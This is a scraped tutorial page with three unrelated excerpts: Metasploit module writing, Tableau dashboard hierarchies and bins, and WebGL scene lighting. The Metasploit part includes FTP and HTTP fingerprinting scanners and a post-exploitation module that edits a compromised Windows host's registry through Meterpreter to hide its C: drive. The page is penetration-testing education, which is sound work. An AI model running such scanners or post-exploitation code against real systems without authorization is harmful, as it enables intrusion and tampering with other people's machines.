(For more resources related to this topic, see here.) Writing out a custom FTP scanner module Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module: require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Ftp include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Apex FTP Detector', 'Description' => '1.0', 'Author' => 'Nipun Jaswal', 'License' => MSF_LICENSE ) register_options( [ Opt::RPORT(21), ], self.class) End We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default. Let's continue with the remaining part of the module: def run_host(target_host) connect(true, false) if(banner) print_status("#{rhost} is running #{banner}") end disconnect end end We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters into the connect function, which are true and false. The true parameter defines the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and recording the banner of the FTP service in the parameter named banner automatically, as shown in the following screenshot: Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and we disconnect the connection to the target. This was an easy module, and I recommend that you should try building simple scanners and other modules like these. Nevertheless, before we run this module, let's check whether the module we just built is correct with regards to its syntax or not. We can do this by passing the module from an in-built Metasploit tool named msftidy as shown in the following screenshot: We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module to be correct. Now, let's run this module and see what we gather: We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server. For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements. Writing out a custom HTTP server scanner Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb as shown in the following code snippet: require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'Server Service Detector', 'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information', 'Author' => 'Nipun_Jaswal', 'License' => MSF_LICENSE ) end We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet: def os_fingerprint(response) if not response.headers.has_key?('Server') return "Unknown OS (No Server Header)" end case response.headers['Server'] when /Win32/, /(Windows/, /IIS/ os = "Windows" when /Apache// os = "*Nix" else os = "Unknown Server Header Reporting: "+response.headers['Server'] end return os end def pb_fingerprint(response) if not response.headers.has_key?('X-Powered-By') resp = "No-Response" else resp = response.headers['X-Powered-By'] end return resp end def run_host(ip) connect res = send_request_raw({'uri' => '/', 'method' => 'GET' }) return if not res os_info=os_fingerprint(res) pb=pb_fingerprint(res) fp = http_fingerprint(res) print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}") end end The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host. Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The result fetched will be stored into the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in the header of the response; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it with a variety of values using regex expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter. Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but will look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response code or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module: Msf auxiliary(http_myscan) > run [*]192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed Writing out post-exploitation modules Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target compromises successfully. So, let's begin with a simple drive disabler module which will disable C: at the target system: require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Post include Msf::Post::Windows::Registry def initialize super( 'Name' => 'Drive Disabler Module', 'Description' => 'C Drive Disabler Module', 'License' => MSF_LICENSE, 'Author' => 'Nipun Jaswal' ) End We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module: def run key1="HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\" print_line("Disabling C Drive") meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') print_line("Setting No Drives For C") meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') print_line("Removing View On The Drive") print_line("Disabled C Drive") end end #class We created a variable called key1, and we stored the path of the registry where we need to create values to disable the drives in it. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setval function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1. This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula, 2^([drive character serial number]-1) . Suppose, we need to disable the C drive. We know that character C is the third character in alphabets. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows: 2^ (3-1) = 2^2= 4 Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output: So, let's see whether we have successfully disabled C: or not: Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our need. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER, because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
Read more
  • 0
  • 0
  • 8054
article-image-interacting-data-dashboards
Packt
23 May 2014
11 min read
Save for later

Interacting with Data for Dashboards

Packt
23 May 2014
11 min read
(For more resources related to this topic, see here.) Hierarchies for revealing the dashboard message It can become difficult to manage data, particularly if you have many columns. It can become more difficult if they are similarly named too. As you'd expect, Tableau helps you to organize your data so that it is easier to navigate and keep track of everything. From the user perspective, hierarchies improve navigation and use by allowing the users to navigate from a headline down to a detailed level. From the Tableau perspective, hierarchies are groups of columns that are arranged in increasing levels of granularity. Each deeper level of the hierarchy refers to more specific details of the data. Some hierarchies are natural hierarchies, such as date. So, say Tableau works out that a column is a date and automatically adds in a hierarchy in this order: year, quarter, month, week, and date. You have seen this already, for example, when you dragged a date across to the Columns shelf, Tableau automatically turned the date into a year. Some hierarchies are not always immediately visible. These hierarchies would need to be set up, and we will look at setting up a product hierarchy that straddles across different tables. This is a nice feature because it means that the hierarchy can reflect the users' understanding of the data and isn't determined only by the underlying data. Getting ready In this article, we will use the existing workbook that you created for this article. We will use the same data. For this article, let's take a copy of the existing worksheet and call it Hierarchies. To do this, right-click on the Worksheet tab and select the Duplicate Sheet option. You can then rename the sheet to Hierarchies. How to do it... Navigate to the DimProductCategory dimension and right-click on the EnglishProductCategoryName attribute. From the pop-up menu, select the Create Hierarchy feature. You can see its location in the following illustration: When you select the option, you will get a textbox entitled Create Hierarchy, which will ask you to specify the name of the hierarchy. We will call our hierarchy Product Category. Once you have entered this into the textbox, click on OK. Your hierarchy will now be created, and it will appear at the bottom of the Dimensions list on the left-hand side of Tableau's interface. Next, go to the DimProductSubcategory dimension and look for the EnglishProductSubCategoryName attribute. Drag it to the Product Category hierarchy under EnglishProductCategoryName, which is already part of the Product Category hierarchy. Now we will add the EnglishProductName attribute, which we will find under the DimProduct dimension. Drag-and-drop it under the EnglishProductSubCategoryName attribute that is already under the Product Category hierarchy. The Product Category hierarchy should now look as follows: The Product Category hierarchy will be easier to understand if we rename the attributes. To do this, right-click on each attribute and choose Rename. Change EnglishProductCategoryName to Product Category. Rename EnglishProductSubcategoryName to Product Subcategory by right-clicking on the attribute and selecting Rename. Rename EnglishProductName to Product. Once you have done this, the hierarchy should look as follows: You can now use your hierarchy to change the details that you wish to see in the data visualization. Now, we will use Product Category of our data visualization rather than Dimension. Remove everything from the Rows shelf and drag the Product Category hierarchy to the Rows shelf. Then, click on the plus sign; it will open the hierarchy, and you will see data for the next level under Product Category, which are subcategories. An example of the Tableau workbook is given in the following illustration. You can see that the biggest differences occurred in the Bikes product category, and they occurred in the years 2006 and 2007 for the Mountain Bikes and Road Bikes categories. To summarize, we have used the Hierarchy feature in Tableau to vary the degree of analysis we see in the dashboard. How it works… Tableau saves the additional information as part of the Tableau workbook. When you share the workbook, the hierarchies will be preserved. The Tableau workbook would need revisions if the hierarchy is changed, or if you add in new dimensions and they need to be maintained. Therefore, they may need some additional maintenance. However, they are very useful features and worth the little extra touch they offer in order to help the dashboard user. There's more... Dashboarding data usually involves providing "at a glance" information for team members to clearly see the issues in the data and to make actionable decisions. Often, we don't need to provide further information unless we are asked for it, and it is a very useful feature that will help us answer more detailed questions. It saves us space on the page and is a very useful dashboard feature. Let's take the example of a business meeting where the CEO wants to know more about the biggest differences or "swings" in the sales amount by category, and then wants more details. The Tableau analyst can quickly place a hierarchy in order to answer more detailed questions if required, and this is done quite simply as described here. Hierarchies also allow us to encapsulate business rules into the dashboard. In this article, we used product hierarchies. We could also add in hierarchies for different calendars, for example, in order to reflect different reporting periods. This will allow the dashboard to be easily reused in order to reflect different reporting calendars, say, you want to show data according to a fiscal year or a calendar year. You could have two different hierarchies: one for fiscal and the other for the calendar year. The dashboard could contain the same measures but sliced by different calendars according to user requirements. The hierarchies feature fits nicely with the Golden Mantra of Information Visualization, since it allows us to summarize the data and then drill down into it as the next step. See also http://www.tableausoftware.com/about/blog/2013/4/lets-talk-about-sets-23043 Classifying your data for dashboards Bins are a simple way of categorizing and bucketing values, depending on the measure value. So, for example, you could "bin" customers depending on their age group or the number of cars that they own. Bins are useful for dashboards because they offer a summary view of the data, which is essential for the "at a glance" function of dashboards. Tableau can create bins automatically, or we can also set up bins manually using calculated fields. This article will show both versions in order to meet the business needs. Getting ready In this article, we will use the existing workbook that you created for this article. We will use the same data. For this article, let's take a copy of the Hierarchies worksheet and by right-clicking on the Worksheet tab, select the Duplicate Sheet option. You can then rename the sheet to Bins. How to do it... Once you have your Bins worksheet in place, right-click on the SalesAmount measure and select the Create Bin option. You can see an example of this in the following screenshot: We will change the value to 5. Once you've done this, press the Load button to reveal the Min, Max, and Diff values of the data, as shown in the following screenshot: When you click on the OK button, you will see a bin appear under the Dimensions area. The following is an example of this: Let's test out our bins! To do this, remove everything from the Rows shelf, leaving only the Product Category hierarchy. Remove any filters from the worksheet and all of the calculations in the Marks shelf. Next, drag SalesAmount (bin) to the Marks area under the Detail and Tooltip buttons. Once again, take SalesAmount (bin) and drag it to the Color button on the Marks shelf. Now, we will change the size of the data points to reflect the size of the elements. To do this, drag SalesAmount (bin) to the Size button. You can vary the overall size of the elements by right-clicking on the Size button and moving the slider horizontally so that you can get your preferred size. To neaten the image, right-click on the Date column heading and select Hide Field Names for Columns from the list. The Tableau worksheet should now look as follows: This allows us to see some patterns in the data. We can also see more details if we click on the data points; you can see an illustration of the details in the data in the following screenshot: However, we might find that the automated bins are not very clear to business users. We can see in the previous screenshot that the SalesAmount(bin) value is £2,440.00. This may not be meaningful to business users. How can we set the bins so that they are meaningful to business users, rather than being automated by Tableau? For example, what if the business team wants to know about the proportion of their sales that fell into well-defined buckets, sliced by years? Fortunately, we can emulate the same behavior as in bins by simply using a calculated field. We can create a very simple IF… THEN ... ELSEIF formula that will place the sales amounts into buckets, depending on the value of the sales amount. These buckets are manually defined using a calculated field, and we will see how to do this now. Before we begin, take a copy of the existing worksheet called Bins and rename it to Bins Set Manually. To do this, right-click on the Sales Amount metric and choose the Create Calculated Field option. In the calculated field, enter the following formula: If [SalesAmount] <= 1000 THEN "1000" ELSEIF [SalesAmount] <= 2000 THEN "2000" ELSEIF [SalesAmount] <= 3000 THEN "3000" ELSEIF [SalesAmount] <= 4000 THEN "4000" ELSEIF [SalesAmount] <= 5000 THEN "5000" ELSEIF [SalesAmount] <= 6000 THEN "6000" ELSE "7000" END When this formula is entered into the Calculated Field window, it looks like what the following screenshot shows. Rename the calculated field to SalesAmount Buckets. Now that we have our calculated field in place, we can use it in our Tableau worksheet to create a dashboard component. On the Columns shelf, place the SalesAmount Buckets calculated field and the Year(Date) dimension attribute. On the Rows shelf, place Sum(SalesAmount) from the Measures section. Place the Product Category hierarchy on the Color button. Drag SalesAmount Buckets from the Dimensions pane to the Size button on the Marks shelf. Go to the Show Me panel and select the Circle View option. This will provide a dot plot feel to data visualization. You can resize the chart by hovering the mouse over the foot of the y axis where the £0.00 value is located. Once you're done with this, drag-and-drop the activities. The Tableau worksheet will look as it appears in the following screenshot: To summarize, we have created bins using Tableau's automatic bin feature. We have also looked at ways of manually creating bins using the Calculated Field feature. How it works... Bins are constructed using a default Bins feature in Tableau, and we can use Calculated Fields in order to make them more useful and complex. They are stored in the Tableau workbook, so you will be able to preserve your work if you send it to someone else. In this article, we have also looked at dot plot visualization, which is a very simple way of representing data that does not use a lot of "ink". The data/ink ratio is useful to simplify a data visualization in order to get the message of the data across very clearly. Dot plots might be considered old fashioned, but they are very effective and are perhaps underused. We can see from the screenshot that the 3000 bucket contained the highest number of sales amount. We can also see that this figure peaks in the year 2007 and then falls in 2008. This is a dashboard element that could be used as a start for further analysis. For example, business users will want to know the reason for the fall in sales for the highest occurring "bin". See also Visual Display of Quantitative Information, Edward Tufte, Graphics Press USA
Read more
  • 0
  • 0
  • 2137

article-image-3d-websites
Packt
23 May 2014
10 min read
Save for later

3D Websites

Packt
23 May 2014
10 min read
(For more resources related to this topic, see here.) Creating engaging scenes There is no adopted style for a 3D website. No metaphor can best describe the process of designing the 3D web. Perhaps what we know the most is what does not work. Often, our initial concept is to model the real world. An early design that was used years ago involved a university that wanted to use its campus map to navigate through its website. One found oneself dragging the mouse repeatedly, as fast as one could, just to get to the other side of campus. A better design would've been a book shelf where everything was in front of you. To view the chemistry department, just grab the chemistry book, and click on the virtual pages to view the faculty, curriculum, and other department information. Also, if you needed to cross-reference this with the math department's upcoming schedule, you could just grab the math book. Each attempt adds to our knowledge and gets us closer to something better. What we know is what most other applications of computer graphics learned—that reality might be a starting point, but we should not let it interfere with creativity. 3D for the sake of recreating the real world limits our innovative potential. Following this starting point, strip out the parts bound by physics, such as support beams or poles that serve no purpose in a virtual world. Such items make the rendering slower by just existing. Once we break these bounds, the creative process takes over—perhaps a whimsical version, a parody, something dark and scary, or a world-emphasizing story. Characters in video games and animated movies take on stylized features. The characters are purposely unrealistic or exaggerated. One of the best animations to exhibit this is Chris Landreth's The Spine, Ryan (Academy Award for best-animated short film in 2004), and his earlier work in Psychological Driven Animation, where the characters break apart by the ravages of personal failure (https://www.nfb.ca/film/ryan). This demonstration will describe some of the more difficult technical issues involved with lighting, normal maps, and the efficient sharing of 3D models. The following scene uses 3D models and textures maps from previous demonstrations but with techniques that are more complex. Engage thrusters This scene has two lampposts and three brick walls, yet we only read in the texture map and 3D mesh for one of each and then reuse the same models several times. This has the obvious advantage that we do not need to read in the same 3D models several times, thus saving download time and using less memory. A new function, copyObject(), was created that currently sits inside the main WebGL file, although it can be moved to mesh3dObject.js. In webGLStart(), after the original objects were created, we call copyObject(), passing along the original object with the unique name, location, rotation, and scale. In the following code, we copy the original streetLight0Object into a new streetLight1Object: streetLight1Object = copyObject( streetLight0Object, "streetLight1", streetLight1Location, [1, 1, 1], [0, 0, 0] ); Inside copyObject(), we first create the new mesh and then set the unique name, location (translation), rotation, and scale: function copyObject(original, name, translation, scale, rotation) { meshObjectArray[ totalMeshObjects ] = new meshObject(); newObject = meshObjectArray[ totalMeshObjects ]; newObject.name = name; newObject.translation = translation; newObject.scale = scale; newObject.rotation = rotation; The object to be copied is named original. We will not need to set up new buffers since the new 3D mesh can point to the same buffers as the original object: newObject.vertexBuffer = original.vertexBuffer; newObject.indexedFaceSetBuffer = original.indexedFaceSetBuffer; newObject.normalsBuffer = original.normalsBuffer; newObject.textureCoordBuffer = original.textureCoordBuffer; newObject.boundingBoxBuffer = original.boundingBoxBuffer; newObject.boundingBoxIndexBuffer = original.boundingBoxIndexBuffer; newObject.vertices = original.vertices; newObject.textureMap = original.textureMap; We do need to create a new bounding box matrix since it is based on the new object's unique location, rotation, and scale. In addition, meshLoaded is set to false. At this stage, we cannot determine if the original mesh and texture map have been loaded since that is done in the background: newObject.boundingBoxMatrix = mat4.create(); newObject.meshLoaded = false; totalMeshObjects++; return newObject; } There is just one more inclusion to inform us that the original 3D mesh and texture map(s) have been loaded inside drawScene(): streetLightCover1Object.meshLoaded = streetLightCover0Object.meshLoaded; streetLightCover1Object.textureMap = streetLightCover0Object.textureMap; This is set each time a frame is drawn, and thus, is redundant once the mesh and texture map have been loaded, but the additional code is a very small hit in performance. Similar steps are performed for the original brick wall and its two copies. Most of the scene is programmed using fragment shaders. There are four lights: the two streetlights, the neon Products sign, and the moon, which sets and rises. The brick wall uses normal maps. However, it is more complex here; the use of spotlights and light attenuation, where the light fades over a distance. The faint moon light, however, does not fade over a distance. Opening scene with four light sources: two streetlights, the Products neon sign, and the moon This program has only three shaders: LightsTextureMap, used by the brick wall with a texture normal map; Lights, used for any object that is illuminated by one or more lights; and Illuminated, used by the light sources such as the moon, neon sign, and streetlight covers. The simplest out of these fragment shaders is Illuminated. It consists of a texture map and the illuminated color, uLightColor. For many objects, the texture map would simply be a white placeholder. However, the moon uses a texture map, available for free from NASA that must be merged with its color: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s, vTextureCoord.t)); gl_FragColor = vec4(fragmentColor.rgb * uLightColor, 1.0); The light color also serves another purpose, as it will be passed on to the other two fragment shaders since each adds its own individual color: off-white for the streetlights, gray for the moon, and pink for the neon sign. The next step is to use the shaderLights fragment shader. We begin by setting the ambient light, which is a dim light added to every pixel, usually about 0.1, so nothing is pitch black. Then, we make a call for each of our four light sources (two streetlights, the moon, and the neon sign) to the calculateLightContribution() function: void main(void) { vec3 lightWeighting = vec3(uAmbientLight, uAmbientLight, uAmbientLight); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight0Loc, uSpotLightDir, false); lightWeighting += uStreetLightColor * calculateLightContribution(uSpotLight1Loc, uSpotLightDir, false); lightWeighting += uMoonLightColor * calculateLightContribution(uMoonLightPos, vec3(0.0, 0.0, 0.0), true); lightWeighting += uProductTextColor * calculateLightContribution(uProductTextLoc, vec3(0.0, 0.0, 0.0), true); All four calls to calculateLightContribution() are multiplied by the light's color (white for the streetlights, gray for the moon, and pink for the neon sign). The parameters in the call to calculateLightContribution(vec3, vec3, vec3, bool) are: location of the light, its direction, the pixel's normal, and the point light. This parameter is true for a point light that illuminates in all directions, or false if it is a spotlight that points in a specific direction. Since point lights such as the moon or neon sign have no direction, their direction parameter is not used. Therefore, their direction parameter is set to a default, vec3(0.0, 0.0, 0.0). The vec3 lightWeighting value accumulates the red, green, and blue light colors at each pixel. However, these values cannot exceed the maximum of 1.0 for red, green, and blue. Colors greater than 1.0 are unpredictable based on the graphics card. So, the red, green, and blue light colors must be capped at 1.0: if ( lightWeighting.r > 1.0 ) lightWeighting.r = 1.0; if ( lightWeighting.g > 1.0 ) lightWeighting.g = 1.0; if ( lightWeighting.b > 1.0 ) lightWeighting.b = 1.0; Finally, we calculate the pixels based on the texture map. Only the street and streetlight posts use this shader, and neither have any tiling, but the multiplication by uTextureMapTiling was included in case there was tiling. The fragmentColor based on the texture map is multiplied by lightWeighting—the accumulation of our four light sources for the final color of each pixel: vec4 fragmentColor = texture2D(uSampler, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)); gl_FragColor = vec4(fragmentColor.rgb * lightWeighting.rgb, 1.0); } In the calculateLightContribution() function, we begin by determining the angle between the light's direction and point's normal. The dot product is the cosine between the light's direction to the pixel and the pixel's normal, which is also known as Lambert's cosine law (http://en.wikipedia.org/wiki/Lambertian_reflectance): vec3 distanceLightToPixel = vec3(vPosition.xyz - lightLoc); vec3 vectorLightPosToPixel = normalize(distanceLightToPixel); vec3 lightDirNormalized = normalize(lightDir); float angleBetweenLightNormal = dot( -vectorLightPosToPixel, vTransformedNormal ); A point light shines in all directions, but a spotlight has a direction and an expanding cone of light surrounding this direction. For a pixel to be lit by a spotlight, that pixel must be in this cone of light. This is the beam width area where the pixel receives the full amount of light, which fades out towards the cut-off angle that is the angle where there is no more light coming from this spotlight: With texture maps removed, we reveal the value of the dot product between the pixel normal and direction of the light if ( pointLight) { lightAmt = 1.0; } else { // spotlight float angleLightToPixel = dot( vectorLightPosToPixel, lightDirNormalized ); // note, uStreetLightBeamWidth and uStreetLightCutOffAngle // are the cosines of the angles, not actual angles if ( angleLightToPixel >= uStreetLightBeamWidth ) { lightAmt = 1.0; } if ( angleLightToPixel > uStreetLightCutOffAngle ) { lightAmt = (angleLightToPixel - uStreetLightCutOffAngle) / (uStreetLightBeamWidth - uStreetLightCutOffAngle); } } After determining the amount of light at that pixel, we calculate attenuation, which is the fall-off of light over a distance. Without attenuation, the light is constant. The moon has no light attenuation since it's dim already, but the other three lights fade out at the maximum distance. The float maxDist = 15.0; code snippet says that after 15 units, there is no more contribution from this light. If we are less than 15 units away from the light, reduce the amount of light proportionately. For example, a pixel 10 units away from the light source receives (15-10)/15 or 1/3 the amount of light: attenuation = 1.0; if ( uUseAttenuation ) { if ( length(distanceLightToPixel) < maxDist ) { attenuation = (maxDist - length(distanceLightToPixel))/maxDist; } else attenuation = 0.0; } Finally, we multiply the values that make the light contribution and we are done: lightAmt *= angleBetweenLightNormal * attenuation; return lightAmt; Next, we must account for the brick wall's normal map using the shaderLightsNormalMap-fs fragment shader. The normal is equal to rgb * 2 – 1. For example, rgb (1.0, 0.5, 0.0), which is orange, would become a normal (1.0, 0.0, -1.0). This normal is converted to a unit value or normalized to (0.707, 0, -0.707): vec4 textureMapNormal = vec4( (texture2D(uSamplerNormalMap, vec2(vTextureCoord.s*uTextureMapTiling.s, vTextureCoord.t*uTextureMapTiling.t)) * 2.0) - 1.0 ); vec3 pixelNormal = normalize(uNMatrix * normalize(textureMapNormal.rgb) ); A normal mapped brick (without red brick texture image) reveals how changing the pixel normal altersthe shading with various light sources We call the same calculateLightContribution() function, but we now pass along pixelNormal calculated using the normal texture map: calculateLightContribution(uSpotLight0Loc, uSpotLightDir, pixelNormal, false); From here, much of the code is the same, except we use pixelNormal in the dot product to determine the angle between the normal and the light sources: float angleLightToTextureMap = dot( -vectorLightPosToPixel, pixelNormal ); Now, angleLightToTextureMap replaces angleBetweenLightNormal because we are no longer using the vertex normal embedded in the 3D mesh's .obj file, but instead we use the pixel normal derived from the normal texture map file, brickNormalMap.png. A normal mapped brick wall with various light sources Objective complete – mini debriefing This comprehensive demonstration combined multiple spot and point lights, shared 3D meshes instead of loading the same 3D meshes, and deployed normal texture maps for a real 3D brick wall appearance. The next step is to build upon this demonstration, inserting links to web pages found on a typical website. In this example, we just identified a location for Products using a neon sign to catch the users' attention. As a 3D website is built, we will need better ways to navigate this virtual space and this is covered in the following section.
Read more
  • 0
  • 0
  • 12252
Modal Close icon
Modal Close icon